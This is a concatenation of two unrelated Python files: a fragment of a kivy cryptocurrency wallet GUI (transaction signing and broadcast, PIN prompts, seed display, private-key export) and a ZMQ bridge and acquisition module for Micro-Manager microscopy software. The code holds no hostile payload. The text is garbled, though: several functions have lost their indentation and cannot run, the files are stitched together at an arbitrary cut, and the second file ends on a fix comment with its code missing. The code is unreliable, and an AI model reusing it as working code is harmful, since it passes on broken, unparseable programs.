        '''Method to show a Information Bubble
        .. parameters::
            text: Message to be displayed
            pos: position for the bubble
            duration: duration the bubble remains on screen. 0 = click to hide
            width: width of the Bubble
            arrow_pos: arrow position for the bubble
        '''
        info_bubble = self.info_bubble
        if not info_bubble:
            # single bubble instance, created lazily and reused
            info_bubble = self.info_bubble = Factory.InfoBubble()
        win = Window
        if info_bubble.parent:
            # detach from previous parent (or its modal wrapper) before re-showing
            win.remove_widget(info_bubble
                                if not info_bubble.modal else
                                info_bubble._modal_view)
        if not arrow_pos:
            info_bubble.show_arrow = False
        else:
            info_bubble.show_arrow = True
            info_bubble.arrow_pos = arrow_pos
        img = info_bubble.ids.img
        if text == 'texture':
            # icon holds a texture not a source image
            # display the texture in full screen
            text = ''
            img.texture = icon
            info_bubble.fs = True
            info_bubble.show_arrow = False
            img.allow_stretch = True
            info_bubble.dim_background = True
            info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
        else:
            info_bubble.fs = False
            info_bubble.icon = icon
            #if img.texture and img._coreimage:
            #    img.reload()
            img.allow_stretch = False
            info_bubble.dim_background = False
            info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
        info_bubble.message = text
        if not pos:
            pos = (win.center[0], win.center[1] - (info_bubble.height/2))
        info_bubble.show(pos, duration, width, modal=modal, exit=exit)
    def tx_dialog(self, tx):
        """Open the transaction-details dialog for `tx`."""
        from .uix.dialogs.tx_dialog import TxDialog
        d = TxDialog(self, tx)
        d.open()
    def sign_tx(self, *args):
        """Sign a transaction off the UI thread (see _sign_tx for the worker)."""
        threading.Thread(target=self._sign_tx, args=args).start()
    def _sign_tx(self, tx, password, on_success, on_failure):
        """Worker: sign `tx`; dispatch callbacks back onto the kivy main thread."""
        try:
            self.wallet.sign_transaction(tx, password)
        except InvalidPassword:
            Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
            return
        Clock.schedule_once(lambda dt: on_success(tx))
    def _broadcast_thread(self, tx, on_complete):
        """Worker: broadcast `tx` and report (ok, txid) on the kivy main thread."""
        ok, txid = self.network.broadcast(tx)
        Clock.schedule_once(lambda dt: on_complete(ok, txid))
    def broadcast(self, tx, pr=None):
        """Broadcast `tx` in the background; mark invoice `pr` paid on success."""
        def on_complete(ok, msg):
            if ok:
                self.show_info(_('Payment sent.'))
                if self.send_screen:
                    self.send_screen.do_clear()
                if pr:
                    self.wallet.invoices.set_paid(pr, tx.txid())
                    self.wallet.invoices.save()
                    self.update_tab('invoices')
            else:
                self.show_error(msg)
        if self.network and self.network.is_connected():
            self.show_info(_('Sending'))
            threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
        else:
            self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
    def description_dialog(self, screen):
        """Prompt for a description and store it back on the screen."""
        from .uix.dialogs.label_dialog import LabelDialog
        text = screen.message
        def callback(text):
            screen.message = text
        d = LabelDialog(_('Enter description'), text, callback)
        d.open()
    @profiler
    def amount_dialog(self, screen, show_max):
        """Prompt for an amount and store it back on the screen."""
        from .uix.dialogs.amount_dialog import AmountDialog
        amount = screen.amount
        if amount:
            # screen stores "<amount> <unit>"; strip the unit for editing
            amount, u = str(amount).split()
            assert u == self.base_unit
        def cb(amount):
            screen.amount = amount
        popup = AmountDialog(show_max, amount, cb)
        popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
    def delete_wallet(self):
        """Ask for confirmation before deleting the current wallet."""
        from .uix.dialogs.question import Question
        basename = os.path.basename(self.wallet.storage.path)
        d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
        d.open()
    def _delete_wallet(self, b):
        """Confirmation callback: require the PIN, then delete the wallet."""
        if b:
            basename = os.path.basename(self.wallet.storage.path)
            self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
    def __delete_wallet(self, pw):
        """Verify the PIN, remove the wallet file, and open the default wallet."""
        wallet_path = self.get_wallet_path()
        dirname = os.path.dirname(wallet_path)
        basename = os.path.basename(wallet_path)
        if self.wallet.has_password():
            try:
                self.wallet.check_password(pw)
            except:
                self.show_error("Invalid PIN")
                return
        self.stop_wallet()
        os.unlink(wallet_path)
        self.show_error("Wallet removed:" + basename)
        d = os.listdir(dirname)
        name = 'default_wallet'
        new_path = os.path.join(dirname, name)
        self.load_wallet_by_name(new_path)
    def show_seed(self, label):
        """PIN-gate access to the wallet seed, then display it on `label`."""
        self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
    def _show_seed(self, label, password):
        """Decrypt the seed/passphrase with `password` and show them on `label`."""
        if self.wallet.has_password() and password is None:
            return
        keystore = self.wallet.keystore
        try:
            seed = keystore.get_seed(password)
            passphrase = keystore.get_passphrase(password)
        except:
            self.show_error("Invalid PIN")
            return
        label.text = _('Seed') + ':\n' + seed
        if passphrase:
            label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
    def change_password(self, cb):
        """Start the PIN-change flow; verify the current PIN first if one is set."""
        if self.wallet.has_password():
            self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
        else:
            self._change_password(cb, None)
    def _change_password(self, cb, old_password):
        """Step 2: validate the old PIN, then prompt for the new one."""
        if self.wallet.has_password():
            if old_password is None:
                return
            try:
                self.wallet.check_password(old_password)
            except InvalidPassword:
                self.show_error("Invalid PIN")
                return
        self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
    def _change_password2(self, cb, old_password, new_password):
        """Step 3: ask the user to re-enter the new PIN for confirmation."""
        self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
    def password_dialog(self, msg, f, args):
        """Prompt for a PIN and then call f(*args, pin) on the main thread."""
        from .uix.dialogs.password_dialog import PasswordDialog
        def callback(pw):
            Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
        if self._password_dialog is None:
            self._password_dialog = PasswordDialog()
        self._password_dialog.init(msg, callback)
        self._password_dialog.open()
    def export_private_keys(self, pk_label, addr):
        """PIN-gate and export the private key for `addr` into `pk_label.data`."""
        if self.wallet.is_watching_only():
            self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
            return
        def show_private_key(addr, pk_label, password):
            if self.wallet.has_password() and password is None:
                return
            if not self.wallet.can_export():
                return
            try:
                key = str(self.wallet.export_private_key(addr, password)[0])
                pk_label.data = key
            except InvalidPassword:
                self.show_error("Invalid PIN")
                return
        self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
acquire.py
|
import zmq
import json
import numpy as np
from base64 import standard_b64decode, standard_b64encode
from types import MethodType #dont delete this gets called in an exec
import warnings
import re
import time
import json
import multiprocessing
import threading
import queue
from inspect import signature
import copy
import types
# for making argument type hints. might be mergable with type mapping
# maps Java type names to readable hint names used for generated parameter names
_CLASS_NAME_MAPPING = {'boolean': 'boolean', 'byte[]': 'uint8array',
                    'double': 'float', 'double[]': 'float64_array', 'float': 'float',
                    'int': 'int', 'int[]': 'uint32_array', 'java.lang.String': 'string',
                    'long': 'int', 'short': 'int', 'void': 'void',
                    'java.util.List': 'list'}
# maps Java array types to the numpy dtype expected for the python argument
_ARRAY_TYPE_TO_NUMPY_DTYPE = {'byte[]': np.uint8, 'double[]': np.float64, 'int[]': np.int32}
# maps Java type names to the python type used to coerce outgoing arguments
_JAVA_TYPE_NAME_TO_PYTHON_TYPE = {'boolean': bool, 'byte[]': np.ndarray,
                    'double': float, 'double[]': np.ndarray, 'float': float,
                    'int': int, 'int[]': np.ndarray, 'java.lang.String': str,
                    'long': int, 'short': int, 'char': int, 'byte': int, 'void': None}
class JavaSocket:
    """
    Wrapper for a ZMQ socket that sends and receives JSON dictionaries.
    """

    def __init__(self, context, port, type, debug):
        """
        :param context: zmq Context used to create the underlying socket
        :param port: localhost TCP port to bind (PUSH) or connect (other types)
        :param type: zmq socket type constant (e.g. zmq.REQ, zmq.PUSH, zmq.PULL)
        :param debug: if True, print connection details
        """
        # request reply socket
        self._socket = context.socket(type)
        self._debug = debug
        if type == zmq.PUSH:
            if debug:
                print('binding {}'.format(port))
            self._socket.bind("tcp://127.0.0.1:{}".format(port))
        else:
            if debug:
                print('connecting {}'.format(port))
            self._socket.connect("tcp://127.0.0.1:{}".format(port))

    def _convert_np_to_python(self, d):
        """
        Recursively search a dictionary and convert any numpy floats/ints
        (including those nested in dicts and lists) to native Python
        floats/ints so the structure can be JSON serialized.
        """
        if not isinstance(d, dict):
            return
        for k, v in d.items():
            if isinstance(v, dict):
                self._convert_np_to_python(v)
            elif isinstance(v, list):
                # BUG FIX: numpy scalars stored directly in lists were previously
                # left unconverted, which made json.dumps fail in send()
                for i, e in enumerate(v):
                    if isinstance(e, dict):
                        self._convert_np_to_python(e)
                    elif np.issubdtype(type(e), np.floating):
                        v[i] = float(e)
                    elif np.issubdtype(type(e), np.integer):
                        v[i] = int(e)
            elif np.issubdtype(type(v), np.floating):
                d[k] = float(v)
            elif np.issubdtype(type(v), np.integer):
                d[k] = int(v)

    def send(self, message, timeout=0):
        """Send `message` as JSON; with timeout (ms) retry non-blocking sends,
        returning True on success and False on timeout."""
        if message is None:
            message = {}
        # make sure any np types convert to python types so they can be json serialized
        self._convert_np_to_python(message)
        if timeout == 0:
            self._socket.send(bytes(json.dumps(message), 'utf-8'))
        else:
            start = time.time()
            while 1000 * (time.time() - start) < timeout:
                try:
                    self._socket.send(bytes(json.dumps(message), 'utf-8'), flags=zmq.NOBLOCK)
                    return True
                except zmq.ZMQError:
                    pass  # ignore, keep trying
            return False

    def receive(self, timeout=0):
        """Receive and JSON-decode a message; with timeout (ms) poll non-blocking,
        returning None on timeout. Raises if the reply encodes an exception."""
        if timeout == 0:
            reply = self._socket.recv()
        else:
            start = time.time()
            reply = None
            while 1000 * (time.time() - start) < timeout:
                try:
                    reply = self._socket.recv(flags=zmq.NOBLOCK)
                    if reply is not None:
                        break
                except zmq.ZMQError:
                    pass  # ignore, keep trying
            if reply is None:
                return reply
        message = json.loads(reply.decode('utf-8'))
        self._check_exception(message)
        return message

    def _check_exception(self, response):
        """Raise if the decoded reply represents a Java-side exception."""
        if ('type' in response and response['type'] == 'exception'):
            raise Exception(response['value'])

    def close(self):
        """Close the underlying ZMQ socket."""
        self._socket.close()
class Bridge:
    """
    Create an object which acts as a client to a corresponding server running within micro-manager.
    This enables construction and interaction with arbitrary java objects
    """
    _DEFAULT_PORT = 4827
    _EXPECTED_ZMQ_SERVER_VERSION = '2.4.0'

    def __init__(self, port=_DEFAULT_PORT, convert_camel_case=True, debug=False):
        """
        :param port: The port on which the bridge operates
        :type port: int
        :param convert_camel_case: If true, methods for Java objects that are passed across the bridge
            will have their names converted from camel case to underscores. i.e. class.methodName()
            becomes class.method_name()
        :type convert_camel_case: boolean
        :param debug: print helpful stuff for debugging
        :type debug: bool
        """
        self._context = zmq.Context()
        self._convert_camel_case = convert_camel_case
        self._debug = debug
        self._master_socket = JavaSocket(self._context, port, zmq.REQ, debug=debug)
        self._master_socket.send({'command': 'connect', })
        reply_json = self._master_socket.receive()
        if reply_json['type'] == 'exception':
            raise Exception(reply_json['message'])
        if 'version' not in reply_json:
            reply_json['version'] = '2.0.0'  # before version was added
        if reply_json['version'] != self._EXPECTED_ZMQ_SERVER_VERSION:
            warnings.warn('Version mistmatch between ZMQ server and Pygellan. '
                          '\nZMQ server version: {}\nPygellan expected version: {}'.format(reply_json['version'],
                                                            self._EXPECTED_ZMQ_SERVER_VERSION))
        self._constructors = reply_json['api']

    def construct_java_object(self, classpath, new_socket=False, args=None):
        """
        Create a new intstance of a an object on the Java side. Returns a Python "Shadow" of the object, which behaves
        just like the object on the Java side (i.e. same methods, fields). Methods of the object can be inferred at
        runtime using iPython autocomplete

        :param classpath: Full classpath of the java object
        :type classpath: string
        :param new_socket: If true, will create new java object on a new port so that blocking calls will not interfere
            with the bridges master port
        :param args: list of arguments to the constructor, if applicable
        :type args: list
        :return: Python "Shadow" to the Java object
        """
        # FIX: default was a shared mutable list (args=[]); normalize None instead
        if args is None:
            args = []
        methods_with_name = [m for m in self._constructors if m['name'] == classpath]
        valid_method_spec = _check_method_args(methods_with_name, args)
        # Calling a constructor, rather than getting return from method
        message = {'command': 'constructor', 'classpath': classpath,
                   'argument-types': valid_method_spec['arguments'],
                   'arguments': _package_arguments(valid_method_spec, args)}
        if new_socket:
            message['new-port'] = True
        self._master_socket.send(message)
        serialized_object = self._master_socket.receive()
        if new_socket:
            # BUG FIX: JavaSocket requires a `debug` argument; it was omitted here,
            # so new_socket=True always raised TypeError
            socket = JavaSocket(self._context, serialized_object['port'], zmq.REQ, debug=self._debug)
        else:
            socket = self._master_socket
        return JavaObjectShadow(socket=socket, serialized_object=serialized_object,
                                convert_camel_case=self._convert_camel_case)

    def _connect_push(self, port):
        """
        Connect a push socket on the given port

        :param port:
        :return:
        """
        return JavaSocket(self._context, port, zmq.PUSH, debug=self._debug)

    def _connect_pull(self, port):
        """
        Connect to a pull socket on the given port

        :param port:
        :return:
        """
        return JavaSocket(self._context, port, zmq.PULL, debug=self._debug)

    def get_magellan(self):
        """
        return an instance of the Micro-Magellan API
        """
        return self.construct_java_object('org.micromanager.magellan.api.MagellanAPI')

    def get_core(self):
        """
        Connect to CMMCore and return object that has its methods

        :return: Python "shadow" object for micromanager core
        """
        # cache the core shadow so repeated calls reuse one Java-side object
        if hasattr(self, 'core'):
            return getattr(self, 'core')
        self.core = self.construct_java_object('mmcorej.CMMCore')
        return self.core

    def get_studio(self):
        """
        return an instance of the Studio object that provides access to micro-manager Java APIs
        """
        return self.construct_java_object('org.micromanager.Studio')
class JavaObjectShadow:
    """
    Generic class for serving as a pyhton interface for a micromanager class using a zmq server backend
    """

    def __init__(self, socket, serialized_object=None, convert_camel_case=True):
        """Build python properties/methods dynamically from the serialized Java API.

        socket: JavaSocket used for all calls on this object
        serialized_object: dict describing the Java object (class, hash-code,
            interfaces, fields, api)
        convert_camel_case: translate Java methodName to python method_name
        """
        self._java_class = serialized_object['class']
        self._socket = socket
        self._hash_code = serialized_object['hash-code']
        self._convert_camel_case = convert_camel_case
        self._interfaces = serialized_object['interfaces']
        # expose each Java field as a python property backed by get/set messages
        for field in serialized_object['fields']:
            exec('JavaObjectShadow.{} = property(lambda instance: instance._access_field(\'{}\'),'
                 'lambda instance, val: instance._set_field(\'{}\', val))'.format(field, field, field))
        methods = serialized_object['api']
        method_names = set([m['name'] for m in methods])
        #parse method descriptions to make python stand ins
        for method_name in method_names:
            lambda_arg_names, unique_argument_names, methods_with_name, \
                method_name_modified = _parse_arg_names(methods, method_name, self._convert_camel_case)
            #use exec so the arguments can have default names that indicate type hints
            exec('fn = lambda {}: JavaObjectShadow._translate_call(self, {}, {})'.format(','.join(['self'] + lambda_arg_names),
                                        eval('methods_with_name'), ','.join(unique_argument_names)))
            #do this one as exec also so "fn" being undefiend doesnt complain
            exec('setattr(self, method_name_modified, MethodType(fn, self))')

    def __del__(self):
        """
        Tell java side this object is garbage collected so it can do the same if needed

        :return:
        """
        if not hasattr(self, '_hash_code'):
            return #constructor didnt properly finish, nothing to clean up on java side
        message = {'command': 'destructor', 'hash-code': self._hash_code}
        self._socket.send(message)
        reply_json = self._socket.receive()
        if reply_json['type'] == 'exception':
            raise Exception(reply_json['value'])

    def __repr__(self):
        #convenience for debugging
        return 'JavaObjectShadow for : ' + self._java_class

    def _access_field(self, name, *args):
        """
        Return a python version of the field with a given name

        :return:
        """
        message = {'command': 'get-field', 'hash-code': self._hash_code, 'name': name}
        self._socket.send(message)
        return self._deserialize(self._socket.receive())

    def _set_field(self, name, value, *args):
        """
        Set the Java-side field with a given name to `value`.

        :return:
        """
        message = {'command': 'set-field', 'hash-code': self._hash_code, 'name': name, 'value': _serialize_arg(value)}
        self._socket.send(message)
        reply = self._deserialize(self._socket.receive())

    def _translate_call(self, *args):
        """
        Translate to appropriate Java method, call it, and return converted python version of its result

        :param args: args[0] is list of dictionaries of possible method specifications
        :param kwargs: hold possible polymorphic args, or none
        :return:
        """
        method_specs = args[0]
        #args that are none are placeholders to allow for polymorphism and not considered part of the spec
        fn_args = [a for a in args[1:] if a is not None]
        valid_method_spec = _check_method_args(method_specs, fn_args)
        #args are good, make call through socket, casting the correct type if needed (e.g. int to float)
        message = {'command': 'run-method', 'hash-code': self._hash_code, 'name': valid_method_spec['name'],
                   'argument-types': valid_method_spec['arguments']}
        message['arguments'] = _package_arguments(valid_method_spec, fn_args)
        self._socket.send(message)
        return self._deserialize(self._socket.receive())

    def _deserialize(self, json_return):
        """
        Convert a JSON reply from the Java side into the appropriate python value.

        :param json_return: decoded reply dict with 'type' and 'value' keys
        :return: an appropriate python type of the converted value
        """
        if json_return['type'] == 'exception':
            raise Exception(json_return['value'])
        elif json_return['type'] == 'null':
            return None
        elif json_return['type'] == 'primitive':
            return json_return['value']
        elif json_return['type'] == 'string':
            return json_return['value']
        elif json_return['type'] == 'list':
            return [self._deserialize(obj) for obj in json_return['value']]
        elif json_return['type'] == 'object':
            if json_return['class'] == 'JSONObject':
                return json.loads(json_return['value'])
            else:
                raise Exception('Unrecognized return class')
        elif json_return['type'] == 'unserialized-object':
            #inherit socket from parent object
            return JavaObjectShadow(socket=self._socket, serialized_object=json_return,
                                    convert_camel_case=self._convert_camel_case)
        else:
            # anything else is assumed to be a serialized primitive array
            return deserialize_array(json_return)
############ Utility functions ############
def serialize_array(array):
    """Base64-encode a numpy array's raw bytes for JSON transport."""
    raw_bytes = array.tobytes()
    return standard_b64encode(raw_bytes).decode('utf-8')
def deserialize_array(json_return):
    """
    Convert a serialized (base64, big-endian) java array to the corresponding
    numpy array.

    :param json_return: dict with a 'type' key (e.g. 'byte-array') and a
        base64-encoded 'value'
    :return: numpy array with the matching dtype
    :raises ValueError: for an unrecognized array type (previously this fell
        through and silently returned None)
    """
    if json_return['type'] == 'byte-array':
        return np.frombuffer(standard_b64decode(json_return['value']), dtype='>u1').copy()
    elif json_return['type'] == 'double-array':
        return np.frombuffer(standard_b64decode(json_return['value']), dtype='>f8').copy()
    elif json_return['type'] == 'int-array':
        return np.frombuffer(standard_b64decode(json_return['value']), dtype='>i4').copy()
    elif json_return['type'] == 'short-array':
        return np.frombuffer(standard_b64decode(json_return['value']), dtype='>i2').copy()
    elif json_return['type'] == 'float-array':
        return np.frombuffer(standard_b64decode(json_return['value']), dtype='>f4').copy()
    raise ValueError('Unrecognized array type: {}'.format(json_return['type']))
def _package_arguments(valid_method_spec, fn_args):
    """
    Serialize the call arguments, coercing each python value to the type the
    chosen Java method signature expects.

    :param valid_method_spec: method spec dict with an 'arguments' type list
    :param fn_args: the python argument values
    :return: list of serialized arguments
    """
    packed = []
    for java_type, value in zip(valid_method_spec['arguments'], fn_args):
        if isinstance(value, JavaObjectShadow):
            packed.append(_serialize_arg(value))
        else:
            packed.append(_serialize_arg(_JAVA_TYPE_NAME_TO_PYTHON_TYPE[java_type](value)))
    return packed
def _serialize_arg(arg):
if type(arg) in [bool, str, int, float]:
return arg #json handles serialization
elif type(arg) == np.ndarray:
return serialize_array(arg)
elif isinstance(arg, JavaObjectShadow):
return {'hash-code': arg._hash_code}
else:
raise Exception('Unknown argumetn type')
def _check_method_args(method_specs, fn_args):
    """
    Compare python arguments to java arguments to find correct function to call

    :param method_specs: candidate method spec dicts (same name, different signatures)
    :param fn_args: python argument values for this call
    :return: one of the method_specs that is valid
    """
    # TODO: check that args can be translated to expected java counterparts (e.g. numpy arrays)
    valid_method_spec = None
    for method_spec in method_specs:
        if len(method_spec['arguments']) != len(fn_args):
            continue
        valid_method_spec = method_spec
        for arg_type, arg_val in zip(method_spec['arguments'], fn_args):
            if isinstance(arg_val, JavaObjectShadow):
                if arg_type not in arg_val._interfaces:
                    # check that it shadows object of the correct type
                    valid_method_spec = None
            # NOTE(review): isinstance(type(arg_val), type(python_class)) compares
            # metaclasses and is True for any two ordinary classes, so this branch
            # effectively never invalidates a candidate. The intent looks like
            # `not isinstance(arg_val, _JAVA_TYPE_NAME_TO_PYTHON_TYPE[arg_type])`
            # — confirm against the live matching behavior before changing it.
            elif not isinstance(type(arg_val), type(_JAVA_TYPE_NAME_TO_PYTHON_TYPE[arg_type])):
                # if a type that gets converted
                valid_method_spec = None
            elif type(arg_val) == np.ndarray:
                # For ND Arrays, need to make sure data types match
                if _ARRAY_TYPE_TO_NUMPY_DTYPE[arg_type] != arg_val.dtype:
                    valid_method_spec = None
        # if valid_method_spec is None:
        #     break
    if valid_method_spec is None:
        raise Exception('Incorrect arguments. \nExpected {} \nGot {}'.format(
            ' or '.join([', '.join(method_spec['arguments']) for method_spec in method_specs]),
            ', '.join([str(type(a)) for a in fn_args]) ))
    return valid_method_spec
def _parse_arg_names(methods, method_name, convert_camel_case):
    """Build the generated-lambda parameter lists for one (possibly overloaded)
    Java method name.

    Returns (lambda_arg_names, unique_argument_names, methods_with_name,
    method_name_modified) — the last loop iteration (the overload with the most
    arguments) determines the final parameter lists; extra args default to None.
    """
    # dont delete because this is used in the exec
    method_name_modified = _camel_case_2_snake_case(method_name) if convert_camel_case else method_name
    # all methods with this name and different argument lists
    methods_with_name = [m for m in methods if m['name'] == method_name]
    min_required_args = 0 if len(methods_with_name) == 1 and len(methods_with_name[0]['arguments']) == 0 else \
        min([len(m['arguments']) for m in methods_with_name])
    # sort with largest number of args last so lambda at end gets max num args
    methods_with_name.sort(key=lambda val: len(val['arguments']))
    for method in methods_with_name:
        # derive readable hint names from the Java argument types
        arg_type_hints = []
        for typ in method['arguments']:
            arg_type_hints.append(_CLASS_NAME_MAPPING[typ]
                                  if typ in _CLASS_NAME_MAPPING else 'object')
        lambda_arg_names = []
        class_arg_names = []
        unique_argument_names = []
        for arg_index, hint in enumerate(arg_type_hints):
            if hint in unique_argument_names:
                # append numbers to end so arg hints have unique names
                i = 1
                while hint + str(i) in unique_argument_names:
                    i += 1
                hint += str(i)
            unique_argument_names.append(hint)
            # this is how overloading is handled for now, by making default arguments as none, but
            # it might be better to explicitly compare argument types
            if arg_index >= min_required_args:
                class_arg_names.append(hint + '=' + hint)
                lambda_arg_names.append(hint + '=None')
            else:
                class_arg_names.append(hint)
                lambda_arg_names.append(hint)
    return lambda_arg_names, unique_argument_names, methods_with_name, method_name_modified
def _camel_case_2_snake_case(name):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
class Acquisition():
    """Python-side handle on a (remote) Micro-Manager acquisition.

    Wraps a Java-side acquisition object reached through a ``Bridge`` and wires
    up optional image processors and hardware hooks that run as local threads
    or processes, communicating with the Java side over push/pull sockets.
    """

    def __init__(self, directory=None, name=None, image_process_fn=None,
                 pre_hardware_hook_fn=None, post_hardware_hook_fn=None,
                 magellan_acq_index=None, process=True, debug=False):
        """
        :param directory: saving directory for this acquisition. Required unless an image process function will be
            implemented that diverts images from saving
        :type directory: str
        :param name: Saving name for the acquisition. Required unless an image process function will be
            implemented that diverts images from saving
        :type name: str
        :param image_process_fn: image processing function that will be called on each image that gets acquired.
            Can either take two arguments (image, metadata) where image is a numpy array and metadata is a dict
            containing the corresponding image metadata. Or a 4 argument version is accepted, which accepts (image,
            metadata, bridge, queue), where bridge and queue are an instance of the pycromanager.acquire.Bridge
            object for the purposes of interacting with arbitrary code on the Java side (such as the micro-manager
            core), and queue is a Queue object that holds upcoming acquisition events
        :param pre_hardware_hook_fn: hook function that will be run just before the hardware is updated before acquiring
            a new image. Accepts either one argument (the current acquisition event) or three arguments (current event,
            bridge, event Queue)
        :param post_hardware_hook_fn: hook function that will be run just after the hardware is updated before acquiring
            a new image. Accepts either one argument (the current acquisition event) or three arguments (current event,
            bridge, event Queue)
        :param magellan_acq_index: run this acquisition using the settings specified at this position in the main
            GUI of micro-magellan (micro-manager plugin). This index starts at 0
        :type magellan_acq_index: int
        :param process: (Experimental) use multiprocessing instead of multithreading for acquisition hooks and image
            processors
        :type process: boolean
        :param debug: print debugging stuff
        :type debug: boolean
        """
        self.bridge = Bridge(debug=debug)
        self._debug = debug
        if magellan_acq_index is not None:
            # Acquisition settings come from the Magellan GUI; no local event queue.
            magellan_api = self.bridge.get_magellan()
            self.acq = magellan_api.create_acquisition(magellan_acq_index)
            self._event_queue = None
        else:
            # TODO: call different constructor if directory and name are None
            # Create thread safe queue for events so they can be passed from multiple processes
            self._event_queue = multiprocessing.Queue()
            core = self.bridge.get_core()
            acq_manager = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcquisitionFactory', args=[core])
            self.acq = acq_manager.create_acquisition(directory, name)
        if image_process_fn is not None:
            processor = self.bridge.construct_java_object('org.micromanager.remote.RemoteImageProcessor')
            self.acq.add_image_processor(processor)
            self._start_processor(processor, image_process_fn, self._event_queue, process=process)
        if pre_hardware_hook_fn is not None:
            hook = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcqHook')
            self._start_hook(hook, pre_hardware_hook_fn, self._event_queue, process=process)
            self.acq.add_hook(hook, self.acq.BEFORE_HARDWARE_HOOK, args=[self.acq])
        if post_hardware_hook_fn is not None:
            hook = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcqHook', args=[self.acq])
            self._start_hook(hook, post_hardware_hook_fn, self._event_queue, process=process)
            self.acq.add_hook(hook, self.acq.AFTER_HARDWARE_HOOK)
        self.acq.start()

        if magellan_acq_index is None:
            event_port = self.acq.get_event_port()

            def event_sending_fn():
                # Runs in its own process: forwards queued events to the Java side.
                bridge = Bridge(debug=debug)
                event_socket = bridge._connect_push(event_port)
                while True:
                    events = self._event_queue.get(block=True)
                    if events is None:
                        # Poison, time to shut down
                        event_socket.send({'events': [{'special': 'acquisition-end'}]})
                        event_socket.close()
                        return
                    event_socket.send({'events': events if type(events) == list else [events]})

            self.event_process = multiprocessing.Process(target=event_sending_fn, args=(), name='Event sending')
            # if multiprocessing else threading.Thread(target=event_sending_fn, args=(), name='Event sending')
            self.event_process.start()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        if self._event_queue is not None: # magellan acquisitions dont have this
            # this should shut down storage and viewer as appropriate
            self._event_queue.put(None)
        # now wait on it to finish
        self.await_completion()

    def await_completion(self):
        """
        Wait for acquisition to finish and resources to be cleaned up
        """
        self.acq.close()

    def acquire(self, events):
        """
        Submit an event or a list of events for acquisition. Optimizations (i.e. taking advantage of
        hardware synchronization, where available), will take place across this list of events, but not
        over multiple calls of this method. A single event is a python dictionary with a specific structure

        :param events: single event (i.e. a dictionary) or a list of events
        """
        self._event_queue.put(events)

    def _start_hook(self, remote_hook, remote_hook_fn, event_queue, process):
        """Spawn a thread/process that services one remote acquisition hook."""
        hook_connected_evt = multiprocessing.Event() if process else threading.Event()

        pull_port = remote_hook.get_pull_port()
        push_port = remote_hook.get_push_port()

        def other_thread_fn():
            bridge = Bridge(debug=self._debug)
            push_socket = bridge._connect_push(pull_port)
            pull_socket = bridge._connect_pull(push_port)
            hook_connected_evt.set()

            while True:
                event_msg = pull_socket.receive()

                if 'special' in event_msg and event_msg['special'] == 'acquisition-end':
                    push_socket.send({})
                    push_socket.close()
                    pull_socket.close()
                    return
                else:
                    params = signature(remote_hook_fn).parameters
                    if len(params) == 1:
                        new_event_msg = remote_hook_fn(event_msg)
                    elif len(params) == 3:
                        new_event_msg = remote_hook_fn(event_msg, bridge, event_queue)
                    else:
                        # BUG FIX: the hook accepts 1 or 3 arguments (see checks above);
                        # the message previously said "2 or 4".
                        raise Exception('Incorrect number of arguments for hook function. Must be 1 or 3')
                    push_socket.send(new_event_msg)

        hook_thread = multiprocessing.Process(target=other_thread_fn, args=(), name='AcquisitionHook') if process\
            else threading.Thread(target=other_thread_fn, args=(), name='AcquisitionHook')
        hook_thread.start()

        hook_connected_evt.wait()  # wait for push/pull sockets to connect

    def _start_processor(self, processor, process_fn, event_queue, process):
        """Spawn a thread/process that services one remote image processor."""
        # this must start first
        processor.start_pull()

        sockets_connected_evt = multiprocessing.Event() if process else threading.Event()

        pull_port = processor.get_pull_port()
        push_port = processor.get_push_port()

        def other_thread_fn():
            bridge = Bridge(debug=self._debug)
            push_socket = bridge._connect_push(pull_port)
            pull_socket = bridge._connect_pull(push_port)
            if self._debug:
                print('image processing sockets connected')
            sockets_connected_evt.set()

            while True:
                message = None
                while message is None:
                    message = pull_socket.receive(timeout=30)  # check for new message

                if 'special' in message and message['special'] == 'finished':
                    push_socket.send(message)  # Continue propagating the finished signal
                    push_socket.close()
                    pull_socket.close()
                    return

                metadata = message['metadata']
                pixels = deserialize_array(message['pixels'])
                # NOTE(review): reshape order is [Width, Height]; row-major image data
                # would normally be [Height, Width] — confirm against the Java sender.
                image = np.reshape(pixels, [metadata['Width'], metadata['Height']])

                params = signature(process_fn).parameters
                if len(params) == 2:
                    processed = process_fn(image, metadata)
                elif len(params) == 4:
                    processed = process_fn(image, metadata, bridge, event_queue)
                else:
                    raise Exception('Incorrect number of arguments for image processing function, must be 2 or 4')

                if processed is None:
                    continue

                if len(processed) != 2:
                    raise Exception('If image is returned, it must be of the form (pixel, metadata)')
                if not processed[0].dtype == pixels.dtype:
                    raise Exception('Processed image pixels must have same dtype as input image pixels, '
                                    'but instead they were {} and {}'.format(processed[0].dtype, pixels.dtype))

                processed_img = {'pixels': serialize_array(processed[0]), 'metadata': processed[1]}
                push_socket.send(processed_img)

        # BUG FIX: this previously tested "if multiprocessing" — the *module*
        # object, which is always truthy — so the process=False flag was
        # silently ignored (compare _start_hook, which correctly tests process).
